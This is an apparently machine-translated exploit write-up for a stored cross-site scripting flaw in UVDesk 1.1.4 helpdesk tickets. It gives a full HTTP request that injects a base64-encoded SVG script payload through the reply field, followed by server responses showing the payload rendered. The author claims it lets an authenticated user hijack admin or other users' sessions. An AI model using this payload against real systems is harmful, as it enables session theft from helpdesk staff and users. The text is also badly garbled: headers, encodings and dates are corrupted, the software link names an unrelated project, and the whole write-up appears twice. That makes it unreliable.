#利用标题: UVDESK 1.1.4-存储的XSS(身份验证)
#日期: 14/08/2023
#利用作者: Hubert Wojciechowski
#联系作者: [email protected]
#供应商homepage: https://www.uvdesk.com/
#软件link: https://github.com/megatkc/aerocms
#版本: 1.1.4
#使用XAMPP,Apache/2.4.48(Win64)OpenSSL/1.1.1.1L PHP/7.4.4.23测试了: Windows 10
#已验证的用户特权。用户可以将XSS发送到管理员或其他用户和被盗会话。
##示例XSS存储在新票中
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
param:回复
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post/uvdesk/public/en/ens/thread/add/1 http/1.1
HOST: 127.0.0.1
内容长度: 812
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:多部分/form-data;边界=--- webkitformboundaryxcjjcgbgzxzxzwlssk
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/115.0.5790.110 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://127.0.0.1/uvdesk/public/en/member/member/ticket/view/1
Accept-incoding: Gzip,放气
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
cookie:紫外线杆=0; phpsessID=4B0J3R934245LPSSQ5LIL3EDM3
连接:关闭
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='threadType'
向前
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='状态'
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='主题'
AAAA
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='to []'
[email protected]
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='回复'
%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4b WXUCZ0IAHR0CDOVL3DY53MY5VCMCV+MJAWMC9ZDMCIIHHTBG5ZONHSAWHSAW5RPSJODHRWOI8VD3D3LNCZLM9YZYZYZY8XOTKOTK5L3HS+AW5RIIB2ZXJZXJAWIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIIH 9ijaiihk9ijaiihdpzhropsixotqiighlawdoddd0imjaw+iibpzd0iehnzij48c2nyaxb0ihr5cgu9inrlehqvzwntyxnjcmmmlwdcimlwdcimlwdci%2bywxlcnqoilh+tuyipoz WVC2NYAXB0PJWVC3ZNPG%3D%3D%22+类型%3D%22Image%2FSVG%2BxML%2BXML%22+width%3D%22300%22+高度%22+高度%3D%22150%22150%22%22%3E%3C%3C%3C%3C%2FEMBEAID%3C%3C%3C%2fp%2fp%3E
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='pic';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='NextView'
停留
--------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
发现HTTP/1.1 302
Date: 2023年8月14日星期一1133333:26 GMT
server: apache/2.4.53(win64)openssl/1.1.1.1n php/7.4.4.29
X-Power-By: php/7.4.29
cache-control: max-age=0,必须重新值,私有
location:/uvdesk/public/en/en/member/ticket/view/1
访问控制- 允许-origin: *
Access-Control-Allow-Methods:获取,帖子,put,选项
访问控制- 允许头:访问对照- 允许- 原素
Access-Control-Allow-Headers:授权
访问控制- 允许头:内容类型
X-Debug-Token: BF1B73
x-debug-token-link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
X-Robots-Tag: NoIndex
Expires: 2023年8月14日星期一11333333:26 GMT
set-cookie: sf_redirect=%7B%22Token%22%22%22BF1B73%22%2C%22ROUTE%22%22%3A%22HELPDESK_MEMBER_ADD_TICKET_TICKET_TICKET_TICKET_THREAD%22%2C%2C%22method%22method%22%22%3A%3A%22post%2 2%2C%22 Controller%22%3A%7B%22CLASS%22%3A%22Webkul%5C%5C%5C%5C%5C%5CCOREFRAMEWORKBUNDER%5C%5C%5C%5C%5C%5C%5CThreadRead%5cthread%5cthread%22%2C%22me thod%22%3A%22savethread%22%2C%22file%22%22%22c%3A%5C%5C%5C%5C%5C%5C%5C%5C%5C%5C%5cuvdesk%5CVENDOR%5CVENDOR%5C%5C%5C%5C%5C%5c%5c%5c% %5C%5C%5C%5C%5CThread.php%22%2C%22LINE%22%22%3A44%7D%2C%2C%22Status_code%22%3A302%2C%2C%22STATUS_TEXT%22%22%22%3A%3A%3A%22found%22%22%7d;路径=/; httponly; samesite=lax
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 398
!doctype html
html
头
meta charset='utf-8' /
meta http-equiv='refresh'content='0; url='/uvdesk/public/en en/ens/member/ticket/ticket/view/1'''/'/
titlerDiredirecting to/uvdesk/public/en/enst/ticket/ticket/view/1/title
/头
身体
重定向到href='/uvdesk/public/en/enst/ticket/ticket/view/1'/uvdesk/public/en en/ens/member/ticket/ticket/view/1/a。
/身体
/html
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
重定向和查看响应:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
Date: Mon,2023年8月14日11:444336014 GMT
server: apache/2.4.53(win64)openssl/1.1.1.1n php/7.4.4.29
X-Power-By: php/7.4.29
cache-control: max-age=0,必须重新值,私有
访问控制- 允许-origin: *
Access-Control-Allow-Methods:获取,帖子,put,选项
访问控制- 允许头:访问对照- 允许- 原素
Access-Control-Allow-Headers:授权
访问控制- 允许头:内容类型
X-Debug-Token: 254CE8
X-Debug-Token-Link: http://127.0.0.0.1/uvdesk/public/_profiler/254CE8
X-Robots-Tag: NoIndex
Expires: 2023年8月14日星期一11:44:14 GMT
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 300607
!doctype html
html
头
title#1 vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv/title
[.]
pembed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IIBPZD0IEHNZIJ48C2NYAXB0IHR5CGU9INRLEHQVZWNTYXNJCMMLWDCI+YWXLCNQNQOILH TUYIPOZWVC2NYAXB0PJWVC3ZNPG====='type='type='type='
[.]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
XSS执行,我们可以向受害者回复票。此有效载荷可以用于新文章,门票和所有应用程序中。
#日期: 14/08/2023
#利用作者: Hubert Wojciechowski
#联系作者: [email protected]
#供应商homepage: https://www.uvdesk.com/
#软件link: https://github.com/megatkc/aerocms
#版本: 1.1.4
#使用XAMPP,Apache/2.4.48(Win64)OpenSSL/1.1.1.1L PHP/7.4.4.23测试了: Windows 10
#已验证的用户特权。用户可以将XSS发送到管理员或其他用户和被盗会话。
##示例XSS存储在新票中
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
param:回复
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
req
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
post/uvdesk/public/en/ens/thread/add/1 http/1.1
HOST: 127.0.0.1
内容长度: 812
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://127.0.0.1
content-type:多部分/form-data;边界=--- webkitformboundaryxcjjcgbgzxzxzwlssk
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/115.0.5790.110 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://127.0.0.1/uvdesk/public/en/member/member/ticket/view/1
Accept-incoding: Gzip,放气
Accept-Language: PL-PL,PL; Q=0.9,EN-US; Q=0.8,en; q=0.7
cookie:紫外线杆=0; phpsessID=4B0J3R934245LPSSQ5LIL3EDM3
连接:关闭
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='threadType'
向前
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='状态'
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='主题'
AAAA
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='to []'
[email protected]
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='回复'
%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4b WXUCZ0IAHR0CDOVL3DY53MY5VCMCV+MJAWMC9ZDMCIIHHTBG5ZONHSAWHSAW5RPSJODHRWOI8VD3D3LNCZLM9YZYZYZY8XOTKOTK5L3HS+AW5RIIB2ZXJZXJAWIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIHIIH 9ijaiihk9ijaiihdpzhropsixotqiighlawdoddd0imjaw+iibpzd0iehnzij48c2nyaxb0ihr5cgu9inrlehqvzwntyxnjcmmmlwdcimlwdcimlwdci%2bywxlcnqoilh+tuyipoz WVC2NYAXB0PJWVC3ZNPG%3D%3D%22+类型%3D%22Image%2FSVG%2BxML%2BXML%22+width%3D%22300%22+高度%22+高度%3D%22150%22150%22%22%3E%3C%3C%3C%3C%2FEMBEAID%3C%3C%3C%2fp%2fp%3E
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='pic';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryxcjjcgbgzxzzwlssk
content-disposition: form-data;名称='NextView'
停留
--------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
发现HTTP/1.1 302
Date: 2023年8月14日星期一1133333:26 GMT
server: apache/2.4.53(win64)openssl/1.1.1.1n php/7.4.4.29
X-Power-By: php/7.4.29
cache-control: max-age=0,必须重新值,私有
location:/uvdesk/public/en/en/member/ticket/view/1
访问控制- 允许-origin: *
Access-Control-Allow-Methods:获取,帖子,put,选项
访问控制- 允许头:访问对照- 允许- 原素
Access-Control-Allow-Headers:授权
访问控制- 允许头:内容类型
X-Debug-Token: BF1B73
x-debug-token-link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
X-Robots-Tag: NoIndex
Expires: 2023年8月14日星期一11333333:26 GMT
set-cookie: sf_redirect=%7B%22Token%22%22%22BF1B73%22%2C%22ROUTE%22%22%3A%22HELPDESK_MEMBER_ADD_TICKET_TICKET_TICKET_TICKET_THREAD%22%2C%2C%22method%22method%22%22%3A%3A%22post%2 2%2C%22 Controller%22%3A%7B%22CLASS%22%3A%22Webkul%5C%5C%5C%5C%5C%5CCOREFRAMEWORKBUNDER%5C%5C%5C%5C%5C%5C%5CThreadRead%5cthread%5cthread%22%2C%22me thod%22%3A%22savethread%22%2C%22file%22%22%22c%3A%5C%5C%5C%5C%5C%5C%5C%5C%5C%5C%5cuvdesk%5CVENDOR%5CVENDOR%5C%5C%5C%5C%5C%5c%5c%5c% %5C%5C%5C%5C%5CThread.php%22%2C%22LINE%22%22%3A44%7D%2C%2C%22Status_code%22%3A302%2C%2C%22STATUS_TEXT%22%22%22%3A%3A%3A%22found%22%22%7d;路径=/; httponly; samesite=lax
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 398
!doctype html
html
头
meta charset='utf-8' /
meta http-equiv='refresh'content='0; url='/uvdesk/public/en en/ens/member/ticket/ticket/view/1'''/'/
titlerDiredirecting to/uvdesk/public/en/enst/ticket/ticket/view/1/title
/头
身体
重定向到href='/uvdesk/public/en/enst/ticket/ticket/view/1'/uvdesk/public/en en/ens/member/ticket/ticket/view/1/a。
/身体
/html
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
重定向和查看响应:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
Date: Mon,2023年8月14日11:444336014 GMT
server: apache/2.4.53(win64)openssl/1.1.1.1n php/7.4.4.29
X-Power-By: php/7.4.29
cache-control: max-age=0,必须重新值,私有
访问控制- 允许-origin: *
Access-Control-Allow-Methods:获取,帖子,put,选项
访问控制- 允许头:访问对照- 允许- 原素
Access-Control-Allow-Headers:授权
访问控制- 允许头:内容类型
X-Debug-Token: 254CE8
X-Debug-Token-Link: http://127.0.0.0.1/uvdesk/public/_profiler/254CE8
X-Robots-Tag: NoIndex
Expires: 2023年8月14日星期一11:44:14 GMT
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 300607
!doctype html
html
头
title#1 vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv/title
[.]
pembed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IIBPZD0IEHNZIJ48C2NYAXB0IHR5CGU9INRLEHQVZWNTYXNJCMMLWDCI+YWXLCNQNQOILH TUYIPOZWVC2NYAXB0PJWVC3ZNPG====='type='type='type='
[.]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
XSS执行,我们可以向受害者回复票。此有效载荷可以用于新文章,门票和所有应用程序中。